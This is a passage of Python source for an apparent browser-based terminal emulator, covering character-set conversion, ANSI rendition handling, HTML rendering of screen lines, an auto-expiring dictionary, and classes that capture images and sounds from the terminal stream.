63561 def handle_special(e): """ Used in conjunction with :py:func:`codecs.register_error`, will replace special ascii characters such as 0xDA and 0xc4 (which are used by ncurses) with their Unicode equivalents. """ # TODO: Get this using curses special characters when appropriate #curses_specials = { ## NOTE: When $TERM is set to "Linux" these end up getting used by things ## like ncurses-based apps. In other words, it makes a whole lot ## of ugly look pretty again. #0xda: u'┌', # ACS_ULCORNER #0xc0: u'└', # ACS_LLCORNER #0xbf: u'┐', # ACS_URCORNER #0xd9: u'┘', # ACS_LRCORNER #0xb4: u'├', # ACS_RTEE #0xc3: u'┤', # ACS_LTEE #0xc1: u'┴', # ACS_BTEE #0xc2: u'┬', # ACS_TTEE #0xc4: u'─', # ACS_HLINE #0xb3: u'│', # ACS_VLINE #0xc5: u'┼', # ACS_PLUS #0x2d: u'', # ACS_S1 #0x5f: u'', # ACS_S9 #0x60: u'◆', # ACS_DIAMOND #0xb2: u'▒', # ACS_CKBOARD #0xf8: u'°', # ACS_DEGREE #0xf1: u'±', # ACS_PLMINUS #0xf9: u'•', # ACS_BULLET #0x3c: u'←', # ACS_LARROW #0x3e: u'→', # ACS_RARROW #0x76: u'↓', # ACS_DARROW #0x5e: u'↑', # ACS_UARROW #0xb0: u'⊞', # ACS_BOARD #0x0f: u'⨂', # ACS_LANTERN #0xdb: u'█', # ACS_BLOCK #} specials = { # Note to self: Why did I bother with these overly descriptive comments? Ugh # I've been staring at obscure symbols far too much lately ⨀_⨀ 128: u'€', # Euro sign 129: u' ', # Unknown (Using non-breaking spaces for all unknowns) 130: u'‚', # Single low-9 quotation mark 131: u'ƒ', # Latin small letter f with hook 132: u'„', # Double low-9 quotation mark 133: u'…', # Horizontal ellipsis 134: u'†', # Dagger 135: u'‡', # Double dagger 136: u'ˆ', # Modifier letter circumflex accent 137: u'‰', # Per mille sign 138: u'Š', # Latin capital letter S with caron 139: u'‹', # Single left-pointing angle quotation 140: u'Œ', # Latin capital ligature OE 141: u' ', # Unknown 142: u'Ž', #  Latin captial letter Z with caron 143: u' ', # Unknown 144: u' ', # Unknown 145: u'‘', # Left single quotation mark 146: u'’', # Right single quotation mark 147: u'“', # Left double quotation mark 148: u'”', # Right double quotation mark 149: u'•', # Bullet 150: u'–', # En dash 151: u'—', # Em dash 152: u'˜', # Small tilde 153: u'™', # Trade mark sign 154: u'š', # Latin small letter S with caron 155: u'›', # Single right-pointing angle quotation mark 156: u'œ', # Latin small ligature oe 157: u'Ø', # Upper-case slashed zero--using same as empty set (216) 158: u'ž', # Latin small letter z with caron 159: u'Ÿ', # Latin capital letter Y with diaeresis 160: u' ', # Non-breaking space 161: u'¡', # Inverted exclamation mark 162: u'¢', # Cent sign 163: u'£', # Pound sign 164: u'¤', # Currency sign 165: u'¥', # Yen sign 166: u'¦', # Pipe, Broken vertical bar 167: u'§', # Section sign 168: u'¨', # Spacing diaeresis - umlaut 169: u'©', # Copyright sign 170: u'ª', # Feminine ordinal indicator 171: u'«', # Left double angle quotes 172: u'¬', # Not sign 173: u"\u00AD", # Soft hyphen 174: u'®', # Registered trade mark sign 175: u'¯', # Spacing macron - overline 176: u'°', # Degree sign 177: u'±', # Plus-or-minus sign 178: u'²', # Superscript two - squared 179: u'³', # Superscript three - cubed 180: u'´', # Acute accent - spacing acute 181: u'µ', # Micro sign 182: u'¶', # Pilcrow sign - paragraph sign 183: u'·', # Middle dot - Georgian comma 184: u'¸', # Spacing cedilla 185: u'¹', # Superscript one 186: u'º', # Masculine ordinal indicator 187: u'»', # Right double angle quotes 188: u'¼', # Fraction one quarter 189: u'½', # Fraction one half 190: u'¾', # Fraction three quarters 191: u'¿', # Inverted question mark 192: u'À', # Latin capital letter A with grave 193: u'Á', # Latin capital letter A with acute 194: u'Â', # Latin capital letter A with circumflex 195: u'Ã', # Latin capital letter A with tilde 196: u'Ä', # Latin capital letter A with diaeresis 197: u'Å', # Latin capital letter A with ring above 198: u'Æ', # Latin capital letter AE 199: u'Ç', # Latin capital letter C with cedilla 200: u'È', # Latin capital letter E with grave 201: u'É', # Latin capital letter E with acute 202: u'Ê', # Latin capital letter E with circumflex 203: u'Ë', # Latin capital letter E with diaeresis 204: u'Ì', # Latin capital letter I with grave 205: u'Í', # Latin capital letter I with acute 206: u'Î', # Latin capital letter I with circumflex 207: u'Ï', # Latin capital letter I with diaeresis 208: u'Ð', # Latin capital letter ETH 209: u'Ñ', # Latin capital letter N with tilde 210: u'Ò', # Latin capital letter O with grave 211: u'Ó', # Latin capital letter O with acute 212: u'Ô', # Latin capital letter O with circumflex 213: u'Õ', # Latin capital letter O with tilde 214: u'Ö', # Latin capital letter O with diaeresis 215: u'×', # Multiplication sign 216: u'Ø', # Latin capital letter O with slash (aka "empty set") 217: u'Ù', # Latin capital letter U with grave 218: u'Ú', # Latin capital letter U with acute 219: u'Û', # Latin capital letter U with circumflex 220: u'Ü', # Latin capital letter U with diaeresis 221: u'Ý', # Latin capital letter Y with acute 222: u'Þ', # Latin capital letter THORN 223: u'ß', # Latin small letter sharp s - ess-zed 224: u'à', # Latin small letter a with grave 225: u'á', # Latin small letter a with acute 226: u'â', # Latin small letter a with circumflex 227: u'ã', # Latin small letter a with tilde 228: u'ä', # Latin small letter a with diaeresis 229: u'å', # Latin small letter a with ring above 230: u'æ', # Latin small letter ae 231: u'ç', # Latin small letter c with cedilla 232: u'è', # Latin small letter e with grave 233: u'é', # Latin small letter e with acute 234: u'ê', # Latin small letter e with circumflex 235: u'ë', # Latin small letter e with diaeresis 236: u'ì', # Latin small letter i with grave 237: u'í', # Latin small letter i with acute 238: u'î', # Latin small letter i with circumflex 239: u'ï', # Latin small letter i with diaeresis 240: u'ð', # Latin small letter eth 241: u'ñ', # Latin small letter n with tilde 242: u'ò', # Latin small letter o with grave 243: u'ó', # Latin small letter o with acute 244: u'ô', # Latin small letter o with circumflex 245: u'õ', # Latin small letter o with tilde 246: u'ö', # Latin small letter o with diaeresis 247: u'÷', # Division sign 248: u'ø', # Latin small letter o with slash 249: u'ù', # Latin small letter u with grave 250: u'ú', # Latin small letter u with acute 251: u'û', # Latin small letter u with circumflex 252: u'ü', # Latin small letter u with diaeresis 253: u'ý', # Latin small letter y with acute 254: u'þ', # Latin small letter thorn 255: u'ÿ', # Latin small letter y with diaeresis } # I left this in its odd state so I could differentiate between the two # in the future. chars = e.object if bytes == str: # Python 2 # Convert e.object to a bytearray for an easy switch to integers. # It is quicker than calling ord(char) on each char in e.object chars = bytearray(e.object) # NOTE: In Python 3 when you iterate over bytes they appear as integers. # So we don't need to convert to a bytearray in Python 3. if isinstance(e, (UnicodeEncodeError, UnicodeTranslateError)): s = [u'%s' % specials[c] for c in chars[e.start:e.end]] return ''.join(s), e.end else: s = [u'%s' % specials[c] for c in chars[e.start:e.end]] return ''.join(s), e.end codecs.register_error('handle_special', handle_special) # TODO List: # # * We need unit tests! # * Add a function that can dump the screen with text renditions represented as their usual escape sequences so applications that try to perform screen-scraping can match things like '\x1b[41mAuthentication configuration' without having to find specific character positions and then examining the renditions on that line. # Helper functions def _reduce_renditions(renditions): """ Takes a list, *renditions*, and reduces it to its logical equivalent (as far as renditions go). Example:: [0, 32, 0, 34, 0, 32] Would become:: [0, 32] Other Examples:: [0, 1, 36, 36] -> [0, 1, 36] [0, 30, 42, 30, 42] -> [0, 30, 42] [36, 32, 44, 42] -> [32, 42] [36, 35] -> [35] """ out_renditions = [] foreground = None background = None for rend in renditions: if rend < 29: if rend not in out_renditions: out_renditions.append(rend) elif rend > 29 and rend < 40: # Regular 8-color foregrounds foreground = rend elif rend > 39 and rend < 50: # Regular 8-color backgrounds background = rend elif rend > 91 and rend < 98: # 'Bright' (16-color) foregrounds foreground = rend elif rend > 99 and rend < 108: # 'Bright' (16-color) backgrounds background = rend elif rend > 1000 and rend < 10000: # 256-color foregrounds foreground = rend elif rend > 10000 and rend < 20000: # 256-color backgrounds background = rend else: out_renditions.append(rend) if foreground: out_renditions.append(foreground) if background: out_renditions.append(background) return out_renditions def unicode_counter(): """ A generator that returns incrementing Unicode characters that can be used as references inside a Unicode array. For example:: >>> counter = unicode_counter() >>> mapping_dict = {} >>> some_array = array('u') >>> # Pretend 'marker ...' below is a reference to something important >>> for i, c in enumerate(u'some string'): ... if c == u' ': # Mark the location of spaces ... # Perform some operation where we need to save a value ... result = some_evaluation(i, c) ... # Save some memory by storing a reference to result instead ... # of the same result over and over again ... if result not in mapping_dict.values(): ... marker = counter.next() ... some_array.append(marker) ... mapping_dict[marker] = result ... else: # Find the existing reference so we can use it again ... for k, v in mapping_dict.items(): ... if v == result: # Use the existing value ... some_array.append(k) ... else: ... some_array.append('\x00') # \x00 == "not interesting" placeholder >>> Now we could iterate over 'some string' and some_array simultaneously using zip(u'some string', some_array) to access those reference markers when we encountered the correct position. This can save a lot of memory if you need to store objects in memory that have a tendancy to repeat (e.g. text rendition lists in a terminal). .. note:: Meant to be used inside the renditions array to reference text rendition lists such as `[0, 1, 34]`. """ n = 1000 # Start at 1000 so we can use lower characters for other things while True: yield unichr(n) if n == 65535: # The end of unicode in narrow builds of Python n = 0 # Reset else: n += 1 # NOTE: Why use a unicode array() to store references instead of just a regular array()? Two reasons: 1) Large namespace. 2) Only need to use one kind of array for everything (convenience). It is also a large memory savings over "just using a list with references to items in a dict." def pua_counter(): """ A generator that returns a Unicode Private Use Area (PUA) character starting at the beginning of Plane 16 (U+100000); counting up by one with each successive call. If this is a narrow Python build the tail end of Plane 15 will be used as a fallback (with a lot less characters). .. note:: Meant to be used as references to non-text objects in the screen array() (since it can only contain unicode characters) """ if SPECIAL == 1048576: # Not a narrow build of Python n = SPECIAL # U+100000 or unichr(SPECIAL) (start of Plane 16) while True: yield unichr(n) if n == 1114111: n = SPECIAL # Reset--would be impressive to make it this far! else: n += 1 else: # This Python build is 'narrow' so we have to settle for less # Hopefully no real-world terminal will actually want to use one of # these characters. In my research I couldn't find a font that used # them. Please correct me if I'm wrong! n = SPECIAL # u'\uf849' while True: yield unichr(n) if n == 63717: # The end of nothing-but-block-chars in Plane 15 n = SPECIAL # Reset else: n += 1 def convert_to_timedelta(time_val): """ Given a *time_val* (string) such as '5d', returns a `datetime.timedelta` object representing the given value (e.g. `timedelta(days=5)`). Accepts the following '<num><char>' formats: ========= ============ ========================= Character Meaning Example ========= ============ ========================= (none) Milliseconds '500' -> 500 Milliseconds s Seconds '60s' -> 60 Seconds m Minutes '5m' -> 5 Minutes h Hours '24h' -> 24 Hours d Days '7d' -> 7 Days M Months '2M' -> 2 Months y Years '10y' -> 10 Years ========= ============ ========================= Examples:: >>> convert_to_timedelta('7d') datetime.timedelta(7) >>> convert_to_timedelta('24h') datetime.timedelta(1) >>> convert_to_timedelta('60m') datetime.timedelta(0, 3600) >>> convert_to_timedelta('120s') datetime.timedelta(0, 120) """ try: num = int(time_val) return timedelta(milliseconds=num) except ValueError: pass num = int(time_val[:-1]) if time_val.endswith('s'): return timedelta(seconds=num) elif time_val.endswith('m'): return timedelta(minutes=num) elif time_val.endswith('h'): return timedelta(hours=num) elif time_val.endswith('d'): return timedelta(days=num) elif time_val.endswith('M'): return timedelta(days=(num*30)) # Yeah this is approximate elif time_val.endswith('y'): return timedelta(days=(num*365)) # Sorry, no leap year support def total_seconds(td): """ Given a timedelta (*td*) return an integer representing the equivalent of Python 2.7's :meth:`datetime.timdelta.total_seconds`. """ return ((( td.microseconds + (td.seconds + td.days * 24 * 3600) * 10**6) / 10**6)) # NOTE: This is something I'm investigating as a way to use the new go_async # module. A work-in-progress. Ignore for now... def spanify_screen(state_obj): """ Iterates over the lines in *screen* and *renditions*, applying HTML markup (span tags) where appropriate and returns the result as a list of lines. It also marks the cursor position via a <span> tag at the appropriate location. """ #logging.debug("_spanify_screen()") results = [] # NOTE: Why these duplicates of self.* and globals? Local variable # lookups are faster--especially in loops. #special = SPECIAL rendition_classes = RENDITION_CLASSES html_cache = state_obj['html_cache'] screen = state_obj['screen'] renditions = state_obj['renditions'] renditions_store = state_obj['renditions_store'] cursorX = state_obj['cursorX'] cursorY = state_obj['cursorY'] show_cursor = state_obj['show_cursor'] class_prefix = state_obj['class_prefix'] #captured_files = state_obj['captured_files'] spancount = 0 current_classes = set() prev_rendition = None foregrounds = ('f0','f1','f2','f3','f4','f5','f6','f7') backgrounds = ('b0','b1','b2','b3','b4','b5','b6','b7') html_entities = {"&": "&amp;", '<': '&lt;', '>': '&gt;'} cursor_span = '<span class="%scursor">' % class_prefix for linecount, line_rendition in enumerate(izip(screen, renditions)): line = line_rendition[0] rendition = line_rendition[1] combined = (line + rendition).tounicode() if html_cache and combined in html_cache: # Always re-render the line with the cursor (or just had it) if cursor_span not in html_cache[combined]: # Use the cache... results.append(html_cache[combined]) continue if not len(line.tounicode().rstrip()) and linecount != cursorY: results.append(line.tounicode()) continue # Line is empty so we don't need to process renditions outline = "" if current_classes: outline += '<span class="%s%s">' % ( class_prefix, (" %s" % class_prefix).join(current_classes)) charcount = 0 for char, rend in izip(line, rendition): rend = renditions_store[rend] # Get actual rendition #if ord(char) >= special: # Special stuff =) ## Obviously, not really a single character #if char in captured_files: #outline += captured_files[char].html() #continue changed = True if char in "&<>": # Have to convert ampersands and lt/gt to HTML entities char = html_entities[char] if rend == prev_rendition: # Shortcut... So we can skip all the logic below changed = False else: prev_rendition = rend if changed and rend: classes = imap(rendition_classes.get, rend) for _class in classes: if _class and _class not in current_classes: # Something changed... Start a new span if spancount: outline += "</span>" spancount -= 1 if 'reset' in _class: if _class == 'reset': current_classes = set() if spancount: for i in xrange(spancount): outline += "</span>" spancount = 0 else: reset_class = _class.split('reset')[0] if reset_class == 'foreground': # Remove any foreground classes [current_classes.pop(i) for i, a in enumerate(current_classes) if a in foregrounds ] elif reset_class == 'background': [current_classes.pop(i) for i, a in enumerate(current_classes) if a in backgrounds ] else: try: current_classes.remove(reset_class) except KeyError: # Trying to reset something that was # never set. Ignore pass else: if _class in foregrounds: [current_classes.pop(i) for i, a in enumerate(current_classes) if a in foregrounds ] elif _class in backgrounds: [current_classes.pop(i) for i, a in enumerate(current_classes) if a in backgrounds ] current_classes.add(_class) if current_classes: outline += '<span class="%s%s">' % ( class_prefix, (" %s" % class_prefix).join(current_classes)) spancount += 1 if linecount == cursorY and charcount == cursorX: # Cursor if show_cursor: outline += '<span class="%scursor">%s</span>' % ( class_prefix, char) else: outline += char else: outline += char charcount += 1 if outline: # Make sure all renditions terminate at the end of the line for whatever in xrange(spancount): outline += "</span>" results.append(outline) if html_cache: html_cache[combined] = outline else: results.append(None) # null is shorter than 4 spaces # NOTE: The client has been programmed to treat None (aka null in # JavaScript) as blank lines. for whatever in xrange(spancount): # Bit of cleanup to be safe results[-1] += "</span>" return (html_cache, results) # Exceptions class InvalidParameters(Exception): """ Raised when `Terminal` is passed invalid parameters. """ pass # Classes class AutoExpireDict(dict): """ An override of Python's `dict` that expires keys after a given *_expire_timeout* timeout (`datetime.timedelta`). The default expiration is one hour. It is used like so:: >>> expiring_dict = AutoExpireDict(timeout=timedelta(minutes=10)) >>> expiring_dict['somekey'] = 'some value' >>> # You can see when this key was created: >>> print(expiring_dict.creation_times['somekey']) 2013-04-15 18:44:18.224072 10 minutes later your key will be gone:: >>> 'somekey' in expiring_dict False The 'timeout' may be be given as a `datetime.timedelta` object or a string like, "1d", "30s" (will be passed through the `convert_to_timedelta` function). By default `AutoExpireDict` will check for expired keys every 30 seconds but this can be changed by setting the 'interval':: >>> expiring_dict = AutoExpireDict(interval=5000) # 5 secs >>> # Or to change it after you've created one: >>> expiring_dict.interval = "10s" The 'interval' may be an integer, a `datetime.timedelta` object, or a string such as '10s' or '5m' (will be passed through the `convert_to_timedelta` function). If there are no keys remaining the `tornado.ioloop.PeriodicCallback` ( ``self._key_watcher``) that checks expiration will be automatically stopped. As soon as a new key is added it will be started back up again. .. note:: Only works if there's a running instances of `tornado.ioloop.IOLoop`. """ def __init__(self, *args, **kwargs): self.io_loop = IOLoop.current() self.creation_times = {} if 'timeout' in kwargs: self.timeout = kwargs.pop('timeout') if 'interval' in kwargs: self.interval = kwargs.pop('interval') super(AutoExpireDict, self).__init__(*args, **kwargs) # Set the start time on every key for k in self.keys(): self.creation_times[k] = datetime.now() self._key_watcher = PeriodicCallback( self._timeout_checker, self.interval, io_loop=self.io_loop) self._key_watcher.start() # Will shut down at the next interval if empty @property def timeout(self): """ A `property` that controls how long a key will last before being automatically removed. May be be given as a `datetime.timedelta` object or a string like, "1d", "30s" (will be passed through the `convert_to_timedelta` function). """ if not hasattr(self, "_timeout"): self._timeout = timedelta(hours=1) # Default is 1-hour timeout return self._timeout @timeout.setter def timeout(self, value): if isinstance(value, basestring): value = convert_to_timedelta(value) self._timeout = value @property def interval(self): """ A `property` that controls how often we check for expired keys. May be given as milliseconds (integer), a `datetime.timedelta` object, or a string like, "1d", "30s" (will be passed through the `convert_to_timedelta` function). """ if not hasattr(self, "_interval"): self._interval = 10000 # Default is every 10 seconds return self._interval @interval.setter def interval(self, value): if isinstance(value, basestring): value = convert_to_timedelta(value) if isinstance(value, timedelta): value = total_seconds(value) * 1000 # PeriodicCallback uses ms self._interval = value # Restart the PeriodicCallback if hasattr(self, '_key_watcher'): self._key_watcher.stop() self._key_watcher = PeriodicCallback( self._timeout_checker, value, io_loop=self.io_loop) def renew(self, key): """ Resets the timeout on the given *key*; like it was just created. """ self.creation_times[key] = datetime.now() # Set/renew the start time # Start up the key watcher if it isn't already running if not self._key_watcher._running: self._key_watcher.start() def __setitem__(self, key, value): """ An override that tracks when keys are updated. """ super(AutoExpireDict, self).__setitem__(key, value) # Set normally self.renew(key) # Set/renew the start time def __delitem__(self, key): """ An override that makes sure *key* gets removed from ``self.creation_times`` dict. """ del self.creation_times[key] super(AutoExpireDict, self).__delitem__(key) def __del__(self): """ Ensures that our `tornado.ioloop.PeriodicCallback` (``self._key_watcher``) gets stopped. """ self._key_watcher.stop() def update(self, *args, **kwargs): """ An override that calls ``self.renew()`` for every key that gets updated. """ super(AutoExpireDict, self).update(*args, **kwargs) for key, value in kwargs.items(): self.renew(key) def clear(self): """ An override that empties ``self.creation_times`` and calls ``self._key_watcher.stop()``. """ super(AutoExpireDict, self).clear() self.creation_times.clear() # Shut down the key watcher right away self._key_watcher.stop() def _timeout_checker(self): """ Walks ``self`` and removes keys that have passed the expiration point. """ if not self.creation_times: self._key_watcher.stop() # Nothing left to watch for key, starttime in list(self.creation_times.items()): if datetime.now() - starttime > self.timeout: del self[key] # AutoExpireDict only works if Tornado is present. # Don't use the HTML_CACHE if Tornado isn't available. try: from tornado.ioloop import IOLoop, PeriodicCallback HTML_CACHE = AutoExpireDict(timeout=timedelta(minutes=1), interval=30000) except ImportError: HTML_CACHE = None class FileType(object): """ An object to hold the attributes of a supported file capture/output type. """ # These attributes are here to prevent AttributeErrors if not overridden thumbnail = None html_template = "" # Must be overridden html_icon_template = "" # Must be overridden # This is for things like PDFs which can contain other FileTypes: is_container = False # Must be overridden helper = None # Optional function to be called when a capture is started original_file = None # Can be used when the file is modified def __init__(self, name, mimetype, re_header, re_capture, suffix="", path="", linkpath="", icondir=None): """ **name:** Name of the file type. **mimetype:** Mime type of the file. **re_header:** The regex to match the start of the file. **re_capture:** The regex to carve the file out of the stream. **suffix:** (optional) The suffix to be appended to the end of the filename (if one is generated). **path:** (optional) The path to a file or directory where the file should be stored. If *path* is a directory a random filename will be chosen. **linkpath:** (optional) The path to use when generating a link in HTML output. **icondir:** (optional) A path to look for a relevant icon to display when generating HTML output. """ self.name = name self.mimetype = mimetype self.re_header = re_header self.re_capture = re_capture self.suffix = suffix # A path just in case something needs to access it outside of Python: self.path = path self.linkpath = linkpath self.icondir = icondir self.file_obj = None def __repr__(self): return "<%s>" % self.name def __str__(self): "Override if the defined file type warrants a text-based output." return self.__repr__() def __del__(self): """ Make sure that self.file_obj gets closed/deleted. """ logging.debug("FileType __del__(): Closing/deleting temp file(s)") try: self.file_obj.close() # Ensures it gets deleted except AttributeError: pass # Probably never got opened properly (bad file); no big try: self.original_file.close() except AttributeError: pass # Probably never got opened/saved properly def raw(self): self.file_obj.seek(0) data = open(self.file_obj).read() self.file_obj.seek(0) return data def html(self): """ Returns the object as an HTML-formatted string. Must be overridden. """ raise NotImplementedError def capture(self, data, term_instance=None): """ Stores *data* as a temporary file and returns that file's object. *term_instance* can be used by overrides of this function to make adjustments to the terminal emulator after the *data* is captured e.g. to make room for an image. """ # Remove the extra \r's that the terminal adds: data = data.replace(b'\r\n', b'\n') logging.debug("capture() len(data): %s" % len(data)) # Write the data to disk in a temporary location self.file_obj = tempfile.TemporaryFile() self.file_obj.write(data) self.file_obj.flush() # Leave it open return self.file_obj def close(self): """ Closes :attr:`self.file_obj` """ try: self.file_obj.close() except AttributeError: pass # file object never got created properly (probably missing PIL) class ImageFile(FileType): """ A subclass of :class:`FileType` for images (specifically to override :meth:`self.html` and :meth:`self.capture`). """ def capture(self, data, term_instance): """ Captures the image contained within *data*. Will use *term_instance* to make room for the image in the terminal screen. .. note:: Unlike :class:`FileType`, *term_instance* is mandatory. """ logging.debug('ImageFile.capture()') global _logged_pil_warning Image = False try: from PIL import Image except ImportError: if _logged_pil_warning: return _logged_pil_warning = True logging.warning(_( "Could not import the Python Imaging Library (PIL). " "Images will not be displayed in the terminal.")) logging.info(_( "TIP: Pillow is a 'friendly fork' of PIL that has been updated " "to work with Python 3 (also works in Python 2.X). You can " "install it with: pip install --upgrade pillow")) return # No PIL means no images. Don't bother wasting memory. if _logged_pil_warning: _logged_pil_warning = False logging.info(_( "Good job installing PIL! Terminal image suppport has been " "re-enabled. Aren't dynamic imports grand?")) #open('/tmp/lastimage.img', 'w').write(data) # Use for debug # Image file formats don't usually like carriage returns: data = data.replace(b'\r\n', b'\n') # shell adds an extra /r i = BytesIO(data) try: im = Image.open(i) except (AttributeError, IOError) as e: # i.e. PIL couldn't identify the file message = _("PIL couldn't process the image (%s)" % e) logging.error(message) term_instance.send_message(message) return # Don't do anything--bad image # Save a copy of the data so the user can have access to the original if self.path: if os.path.exists(self.path): if os.path.isdir(self.path): self.original_file = tempfile.NamedTemporaryFile( suffix=self.suffix, dir=self.path) self.original_file.write(data) self.original_file.flush() self.original_file.seek(0) # Just in case # Resize the image to be small enough to fit within a typical terminal if im.size[0] > 640 or im.size[1] > 480: im.thumbnail((640, 480), Image.ANTIALIAS) # Get the current image location and reference so we can move it around img_Y = term_instance.cursorY img_X = term_instance.cursorX ref = term_instance.screen[img_Y][img_X] if term_instance.em_dimensions: # Make sure the image will fit properly in the screen width = im.size[0] height = im.size[1] if height <= term_instance.em_dimensions['height']: # Fits within a line. No need for a newline num_chars = int(width/term_instance.em_dimensions['width']) # Move the cursor an equivalent number of characters term_instance.cursor_right(num_chars) else: # This is how many newlines the image represents: newlines = int(height/term_instance.em_dimensions['height']) term_instance.screen[img_Y][img_X] = u' ' # Empty old location term_instance.cursorX = 0 term_instance.newline() # Start with a newline if newlines > term_instance.cursorY: # Shift empty lines at the bottom to the top to kinda sorta # make room for the images so the user doesn't have to # scroll (hey, it works!) for i in xrange(newlines): line = term_instance.screen.pop() rendition = term_instance.renditions.pop() term_instance.screen.insert(0, line) term_instance.renditions.insert(0, rendition) if term_instance.cursorY < (term_instance.rows - 1): term_instance.cursorY += 1 # Save the new image location term_instance.screen[ term_instance.cursorY][term_instance.cursorX] = ref term_instance.newline() # Follow-up newline elif term_instance.em_dimensions == None: # No way to calculate the number of lines the image will take term_instance.screen[img_Y][img_X] = u' ' # Empty old location term_instance.cursorY = term_instance.rows - 1 # Move to the end # ... so it doesn't get cut off at the top # Save the new image location term_instance.screen[ term_instance.cursorY][term_instance.cursorX] = ref # Make some space at the bottom too just in case term_instance.newline() term_instance.newline() else: # When em_dimensions are set to 0 assume the user intentionally # wants things to be sized as inline as possible. term_instance.newline() # Write the captured image to disk if self.path: if os.path.exists(self.path): if os.path.isdir(self.path): # Assume that a path was given for a reason and use a # NamedTemporaryFile instead of TemporaryFile. self.file_obj = tempfile.NamedTemporaryFile( suffix=self.suffix, dir=self.path) # Update self.path to use the new, actual file path self.path = self.file_obj.name else: self.file_obj = open(self.path, 'rb+') else: self.file_obj = tempfile.TemporaryFile(suffix=self.suffix) try: im.save(self.file_obj, im.format) except (AttributeError, IOError): # PIL was compiled without (complete) support for this format logging.error(_( "PIL is missing support for this image type (%s). You probably" " need to install zlib-devel and libjpeg-devel then re-install " "it with 'pip install --upgrade PIL' or 'pip install " "--upgrade Pillow'" % self.name)) try: self.file_obj.close() # Can't do anything with it except AttributeError: pass # File was probably just never opened/saved properly return None self.file_obj.flush() self.file_obj.seek(0) # Go back to the start return self.file_obj def html(self): """ Returns :attr:`self.file_obj` as an <img> tag with the src set to a data::URI. """ try: from PIL import Image except ImportError: return # Warnings will have already been printed by this point if not self.file_obj: return u"" self.file_obj.seek(0) try: im = Image.open(self.file_obj) except IOError: # i.e. PIL couldn't identify the file return u"<i>Error displaying image</i>" self.file_obj.seek(0) # Need to encode base64 to create a data URI encoded = base64.b64encode(self.file_obj.read()) data_uri = "data:image/{type};base64,{encoded}".format( type=im.format.lower(), encoded=encoded.decode('utf-8')) link = "%s/%s" % (self.linkpath, os.path.split(self.path)[1]) if self.original_file: link = "%s/%s" % ( self.linkpath, os.path.split(self.original_file.name)[1]) if self.thumbnail: return self.html_icon_template.format( link=link, src=data_uri, width=im.size[0], height=im.size[1]) return self.html_template.format( link=link, src=data_uri, width=im.size[0], height=im.size[1]) class PNGFile(ImageFile): """ An override of :class:`ImageFile` for PNGs to hard-code the name, regular expressions, mimetype, and suffix. """ name = _("PNG Image") mimetype = "image/png" suffix = ".png" re_header = re.compile(b'.*\x89PNG\r', re.DOTALL) re_capture = re.compile(b'(\x89PNG\r.+?IEND\xaeB`\x82)', re.DOTALL) html_template = ( '<a target="_blank" href="{link}" ' 'title="Click to open the original file in a new window (full size)">' '<img src="{src}" width="{width}" height="{height}">' '</a>' ) def __init__(self, path="", linkpath="", **kwargs): """ **path:** (optional) The path to a file or directory where the file should be stored. If *path* is a directory a random filename will be chosen. """ self.path = path self.linkpath = linkpath self.file_obj = None # Images will be displayed inline so no icons unless overridden: self.html_icon_template = self.html_template class JPEGFile(ImageFile): """ An override of :class:`ImageFile` for JPEGs to hard-code the name, regular expressions, mimetype, and suffix. """ name = _("JPEG Image") mimetype = "image/jpeg" suffix = ".jpeg" re_header = re.compile( b'.*\xff\xd8\xff.+JFIF\x00|.*\xff\xd8\xff.+Exif\x00', re.DOTALL) re_capture = re.compile(b'(\xff\xd8\xff.+?\xff\xd9)', re.DOTALL) html_template = ( '<a target="_blank" href="{link}" ' 'title="Click to open the original file in a new window (full size)">' '<img src="{src}" width="{width}" height="{height}">' '</a>' ) def __init__(self, path="", linkpath="", **kwargs): """ **path:** (optional) The path to a file or directory where the file should be stored. If *path* is a directory a random filename will be chosen. """ self.path = path self.linkpath = linkpath self.file_obj = None # Images will be displayed inline so no icons unless overridden: self.html_icon_template = self.html_template class SoundFile(FileType): """ A subclass of :class:`FileType` for sound files (e.g. .wav). Overrides :meth:`self.html` and :meth:`self.capture`. """ # NOTE: I disabled autoplay on these sounds because it causes the browser to # play back the sound with every screen update! Press return a few times # and the sound will play a few times; annoying! html_template = ( '<audio controls>' '<source src="{src}" type="{mimetype}">' 'Your browser does not support this audio format.' '</audio>' ) display_metadata = None # Can be overridden to send a message to the user def capture(self, data, term_instance): """ Captures the sound contained within *data*. Will use *term_instance* to make room for the embedded sound control in the terminal screen. .. note:: Unlike :class:`FileType`, *term_instance* is mandatory. """ logging.debug('SoundFile.capture()') # Fix any carriage returns (generated by the shell): data = data.replace(b'\r\n', b'\n') # Make some room for the audio controls: term_instance.newline() # Write the captured image to disk if self.path: if os.path.exists(self.path): if os.path.isdir(self.path): # Assume that a path was given for a reason and use a # NamedTemporaryFile instead of TemporaryFile. self.file_obj = tempfile.NamedTemporaryFile( suffix=self.suffix, dir=self.path) # Update self.path to use the new, actual file path self.path = self.file_obj.name else: self.file_obj = open(self.path, 'rb+') else: self.file_obj = tempfile.TemporaryFile(suffix=self.suffix) self.file_obj.write(data) self.file_obj.flush() self.file_obj.seek(0) # Go back to the start if self.display_metadata: self.display_metadata(term_instance) return self.file_obj def html(self): """ Returns :attr:`self.file_obj` as an <img> tag with the src set to a data::URI. """ if not self.file_obj: return u"" self.file_obj.seek(0) # Need to encode base64 to create a data URI encoded = base64.b64encode(self.file_obj.read()) data_uri = "data:{mimetype};base64,{encoded}".format( mimetype=self.mimetype, encoded=encoded.decode('utf-8')) link = "%s/%s" % (self.linkpath, os.path.split(self.path)[1]) if self.original_file: link = "%s/%s" % ( self.linkpath, os.path.split(self.original_file.name)[1]) if self.thumbnail: return self.html_icon_template.format( link=link, src=data_uri, icon=self.thumbnail, mimetype=self.mimetype) return self.html_template.format( link=link, src=data_uri, mimetype=self.mimetype) class WAVFile(SoundFile): """ An override of :class:`SoundFile` for WAVs to hard-code the name, regular expressions, mimetype, and suffix. Also, a :func:`helper` function is provided that adjusts the `self.re_capture` regex so that it precisely matches the WAV file being captured. """ name = _("WAV Sound") mimetype = "audio/x-wav" suffix = ".wav" re_header = re.compile(b'RIFF....WAVEfmt', re.DOTALL) re_capture = re.compile(b'(RIFF....WAVEfmt.+?\r\n)', re.DOTALL) re_wav_header = re.compile(b'(RIFF.{40})', re.DOTALL) def __init__(self, path="", linkpath="", **kwargs): """ **path:** (optional) The path to a file or directory where the file should be stored. If *path* is a directory a random filename will be chosen. """ self.path = path self.linkpath = linkpath self.file_obj = None self.sent_message = False # Sounds will be displayed inline so no icons unless overridden: self.html_icon_template = self.html_template def helper(self, term_instance): """ Called at the start of a WAV file capture. Calculates the length of the file and modifies `self.re_capture` with laser precision. """ data = term_instance.capture 